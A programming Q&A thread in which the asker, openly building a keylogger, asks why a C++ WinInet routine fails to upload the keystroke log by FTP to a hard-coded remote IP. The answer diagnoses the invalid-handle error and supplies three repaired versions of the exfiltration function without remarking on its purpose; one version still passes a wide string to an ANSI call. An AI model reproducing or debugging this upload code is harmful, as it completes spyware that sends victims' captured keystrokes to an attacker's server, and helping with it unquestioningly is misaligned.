# GetLastError() returns error 6 from FtpPutFile()

Tags: c++, upload

I'm developing a keylogger for a project.  When trying to upload the logs to a server with FTP, `GetLastError()` returns 6 for `FtpPutFile()`.  I didn't find a solution.  One solution I did find was the `hint` is invalid, but I replaced 0 or NULL and still get the same error.

```
#pragma comment(lib, "Wininet.lib")
#include <Windows.h>
#include <iostream>
#include <WinInet.h>
#include <tchar.h>
using namespace std;

int  upload()
{
    string file = "C:\\Users\\crypterdev\\Documents\\Visual Studio 2015\\Projects\\Keyspy\\Release\\log.txt";
    string site = "142.93.169.69";
    string user = "user";
    string pass = "pass";

    if (!ifstream(file))
    {
        cout << "no file\n";
        return 0;
    }

    HINTERNET hint = InternetOpen(0, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL,INTERNET_FLAG_ASYNC);
    HINTERNET hftp = InternetConnect(hint, (LPCWSTR)site.c_str(), INTERNET_DEFAULT_FTP_PORT,
        (LPCWSTR) user.c_str(), (LPCWSTR)pass.c_str(), INTERNET_SERVICE_FTP, 0, 0);

    if (!FtpPutFile(hftp, (LPCWSTR)file.c_str(), (LPCWSTR)"log.txt", FTP_TRANSFER_TYPE_BINARY, 0))
    {
        //cout << "FAIL!" << endl;
        cout << GetLastError() << endl;
    }
    else
    {
        cout << "file sended !";
    }

    InternetCloseHandle(hftp);
    InternetCloseHandle(hint);
    return 0;
}
```

Answer (score 0):

Error 6 is `ERROR_INVALID_HANDLE`.  You are not checking the return values of `InternetOpen()` and `InternetConnect()` for failures before calling `FtpPutFile()`.

You are, in fact, passing an invalid handle to `FtpPutFile()`, because they are actually failing, because all of your `LPCWSTR` typecasts are simply wrong.  You can't just typecast a `char*` pointer to `wchar_t*` and expect everything to work. Remove the typecasts and watch the compiler then complain to you.  There is a reason for that.

You need to use `MultiByteToWideChar()` (or equivalent) to actually *convert* the `char` data to `wchar_t`, eg:

```cpp
#include <Windows.h>
#include <WinInet.h>

#include <iostream>
#include <string>
#include <vector>
using namespace std;

#pragma comment(lib, "Wininet.lib")

wstring to_wstring(const string &s)
{
    int len = MultiByteToWideChar(CP_ACP, 0, s.c_str(), s.size(), NULL, 0);
    if (len > 0)
    {
        vector<WCHAR> vec(len);
        MultiByteToWideChar(CP_ACP, 0, s.c_str(), s.size(), &vec[0], len);
        return wstring(&vec[0], len);
    }
    return wstring();
}

bool upload()
{
    string file = "C:\\Users\\crypterdev\\Documents\\Visual Studio 2015\\Projects\\Keyspy\\Release\\log.txt";
    string site = "142.93.169.69";
    string user = "user";
    string pass = "pass";

    if (!ifstream(file))
    {
        cout << "no file" << endl;
        return false;
    }

    HINTERNET hint = InternetOpenW(0, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, INTERNET_FLAG_ASYNC);
    if (!hint)
    {
        cout << "InternetOpen failed! Error " << GetLastError() << endl;
        return false;
    }

    HINTERNET hftp = InternetConnectW(hint, to_wstring(site).c_str(), INTERNET_DEFAULT_FTP_PORT, to_wstring(user).c_str(), to_wstring(pass).c_str(), INTERNET_SERVICE_FTP, 0, 0);
    if (!hftp)
    {
        cout << "InternetConnect failed! Error " << GetLastError() << endl;
        InternetCloseHandle(hint);
        return false;
    }

    if (!FtpPutFileW(hftp, to_wstring(file).c_str(), L"log.txt", FTP_TRANSFER_TYPE_BINARY, 0))
    {
        cout << "FtpPutFile failed! Error " << GetLastError() << endl;
        InternetCloseHandle(hftp);
        InternetCloseHandle(hint);
        return false;
    }

    cout << "file sent!" << endl;

    InternetCloseHandle(hftp);
    InternetCloseHandle(hint);

    return true;
}
```

Or, simply use `std::wstring` to begin with instead of using `std::string` at all:

```cpp
#include <Windows.h>
#include <WinInet.h>

#include <iostream>
#include <string>
using namespace std;

#pragma comment(lib, "Wininet.lib")

bool upload()
{
    wstring file = L"C:\\Users\\crypterdev\\Documents\\Visual Studio 2015\\Projects\\Keyspy\\Release\\log.txt";
    wstring site = L"142.93.169.69";
    wstring user = L"user";
    wstring pass = L"pass";

    if (!wifstream(file))
    {
        cout << "no file" << endl;
        return 0;
    }

    HINTERNET hint = InternetOpenW(0, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL,INTERNET_FLAG_ASYNC);
    if (!hint)
    {
        cout << "InternetOpen failed! Error " << GetLastError() << endl;
        return false;
    }

    HINTERNET hftp = InternetConnectW(hint, site.c_str(), INTERNET_DEFAULT_FTP_PORT, user.c_str(), pass.c_str(), INTERNET_SERVICE_FTP, 0, 0);
    if (!hftp)
    {
        cout << "InternetOpen failed! Error " << GetLastError() << endl;
        InternetCloseHandle(hint);
        return false;
    }

    if (!FtpPutFileW(hftp, file.c_str(), L"log.txt", FTP_TRANSFER_TYPE_BINARY, 0))
    {
        cout << "FtpPutFile failed! Error " << GetLastError() << endl;
        InternetCloseHandle(hftp);
        InternetCloseHandle(hint);
        return false;
    }

    cout << "file sent!" << endl;

    InternetCloseHandle(hftp);
    InternetCloseHandle(hint);

    return true;
}
```

Otherwise, if you want to keep using `std::string` as-is, then just use the ANSI version of the WinInet functions:

```cpp
#include <Windows.h>
#include <WinInet.h>

#include <iostream>
#include <string>
using namespace std;

#pragma comment(lib, "Wininet.lib")

bool upload()
{
    string file = "C:\\Users\\crypterdev\\Documents\\Visual Studio 2015\\Projects\\Keyspy\\Release\\log.txt";
    string site = "142.93.169.69";
    string user = "user";
    string pass = "pass";

    if (!ifstream(file))
    {
        cout << "no file" << endl;
        return 0;
    }

    HINTERNET hint = InternetOpenA(0, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, INTERNET_FLAG_ASYNC);
    if (!hint)
    {
        cout << "InternetOpen failed! Error " << GetLastError() << endl;
        return false;
    }

    HINTERNET hftp = InternetConnectA(hint, site.c_str(), INTERNET_DEFAULT_FTP_PORT, user.c_str(), pass.c_str(), INTERNET_SERVICE_FTP, 0, 0);
    if (!hftp)
    {
        cout << "InternetOpen failed! Error " << GetLastError() << endl;
        InternetCloseHandle(hint);
        return false;
    }

    if (!FtpPutFileA(hftp, file.c_str(), L"log.txt", FTP_TRANSFER_TYPE_BINARY, 0))
    {
        cout << "FtpPutFile failed! Error " << GetLastError() << endl;
        InternetCloseHandle(hftp);
        InternetCloseHandle(hint);
        return false;
    }

    cout << "file sent!" << endl;

    InternetCloseHandle(hftp);
    InternetCloseHandle(hint);

    return true;
}
```